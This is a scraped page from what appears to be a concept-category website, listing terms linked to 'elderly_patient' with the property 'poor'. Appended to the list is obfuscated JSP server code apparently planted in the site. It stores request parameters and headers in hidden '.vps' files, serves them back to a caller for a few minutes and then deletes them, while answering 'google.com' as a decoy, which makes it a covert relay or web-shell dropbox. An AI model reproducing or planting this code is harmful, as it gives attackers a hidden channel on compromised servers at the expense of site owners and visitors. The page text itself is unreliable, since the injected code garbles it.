Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
elderly_patient
with nuance
poor
:
poor:candidate,
Simple categories matching
poor
:
farming,
facility,
group,
sector,
choice,
condition,
housing,
woman,
class,
quality,
household,
strength,
country,
people,
performance,
surface,
material,
community,
food,
team,
connection,
labor,
property,
level,
means,
equipment,
area,
substrate,
medium,
aggregate,
outcast,
individual,
transfer,
land,
soil,
requirement,
solvent,
candidate,
industry,
residue,
population,
society,
weather,
child,
Members with property
poor
:
elderly,
gym,
orphan,
cork,
extreme_heat,
homeless_hostel,
motion,
lack,
woman,
needy,
slow_response,
contamination,
indian_country,
education,
earth,
fishing_community,
insufficient_security,
shantytown,
fish,
dilapidated_structure,
sawdust,
jerky_movement,
toilet,
bad_brakes,
fog,
slip,
loose_shingle,
low_strength,
communication_overhead,
dirt,
brittleness,
bus_shelter,
humidity,
la,
agriculture,
internet_service,
high_heat,
alcohol,
mature_straw,
spice,
heath_land,
printer,
soup,
inspection_time,
internet,
yeast_bread,
gelatin,
alkaline_soil,
health_service,
boisterous_environment,
fresh_sawdust,
incorrect_shoes,
comparative_softness,
donut,
low_gloss,
heathland_soil,
polystyrene,
flaw,
extreme_dryness,
chalk,
land_alienation,
water_agar,
salt,
track,
extreme_cold,
sackcloth,
injury,
slum_pocket,
dull_light,
african_country,
practised_agriculture,
high-temperature_condensate,
resisting_bit,
poor,
open_circuit,
untreated_wood,
child_labour,
line,
spaghetti,
low_light,
poor_visibility,
waste,
transport,
water_stress,
fisher_woman,
fold,
high_humidity,
cost,
soft_drink,
drought,
softness,
public_education,
slum,
headlight,
cookie,
tricycle,
scrape,
vegetable,
rigidity,
changing_organization,
zero_visibility,
damp,
poor_accommodation,
farm_hands,
wine,
glue,
hot_dog,
food_security,
sugar,
surface_contamination,
marketplace,
tidal_flow,
fried_food,
storm,
local_group,
copper,
sorghum,
shop,
gauze,
disadvantaged_family,
verbal_disruption,
sweet_roll,
ground_corn,
ipod_headphone,
adobe,
poor_communication,
trench_town,
benefit,
indigenous_people,
black_he,
wooden_fiber,
vigor,
coffee,
streak,
rag,
buffer,
free_state,
leper,
waiting_room,
youth_service,
baltimore_city,
vaccination_centre,
cement,
aqueous_waste,
rough_surface,
nutrient_deficiency,
computer_microphone,
flow_meter,
dairying,
climate,
salty_snack,
material_defect,
adams_county,
high_haze,
soda,
urban_slum,
housing,
loose_sand,
widow,
north_street,
pu_foam,
homeless,
sewage_network,
skimmer,
inadequate_sanitation,
washing_facility,
podzol,
heat,
death,
basic_education,
frozen_ground,
sanitation,
indian_state,
financial_service,
missing_print,
sand_storm,
unclear_requirement,
xylene,
crack,
drought_area,
no_window,
social_adjustment,
bedsit,
inconsistency,
micro_sector,
tree_bark,
sandy_bog,
crookedness,
public-transport_links,
physical_injury,
wire_net,
sand,
meat,
fecal_contamination,
dry_soil,
black_spot,
navy,
desk,
printing,
cold,
septic_tank,
villa,
rural_setting,
agricultural_sector,
silicon,
united_state,
nutrition,
sweetened_beverage,
potato,
street,
paper,
health,
limited_availability,
water,
aluminium,
northeast_region,
rural_community,
unattractive_toilet,
electrical_storm,
clay,
hardpan,
heavy_clay,
knock,
cereal_straw,
cape_flats,
candy,
stain,
classroom,
clay_subsoil,
clothing,
susceptibility,
no_lighting,
nosocomial_infection,
chair,
insufficient_strength,
shellfish,
aegean_greece,
titanium,
usa,
straw,
barren_land,
elderly_patient,
soil,
cloth,
village,
geographic_isolation,
haze,
eroded_soil,
health_education,
subsoil,
manufacturing_industry,
vacant_land,
numerous_defect,
rice_straw,
legacy,
cake,
mold,
limestone,
fog_haze,
footpath,
cellulose,
temperament_problem,
inner_city,
primary_education,
snack,
asphalt,
developing_country,
shed_skin,
poor_strength,
sri-lanka_range,
plastic_cup,
land,
swampy_area,
disabled_people,
marble,
wood,
dryness,
turnover,
cafe,
dressing,
loose_jumper,
poor_lighting,
indigent_prisoner,
waste_timber,
newspaper,
snow_storm,
ice,
body_conformation,
acidic_sandstone,
summer_humidity,
telephone,
lava_soil,
no_tap,
slum_child,
indigenous_group,
disease,
bread,
brass,
slow_speed,
satellite_links,
state,
labour,
cell_boundary,
damp_soil,
oregon_state,
stadium,
dry_basalt,
jagged_edge,
teaching_material,
computer,
pure_clay,
pasta,
frail_individual,
chalk_marl,
squatter_settlement,
gravel,
smoker,
excessive_heat,
night,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>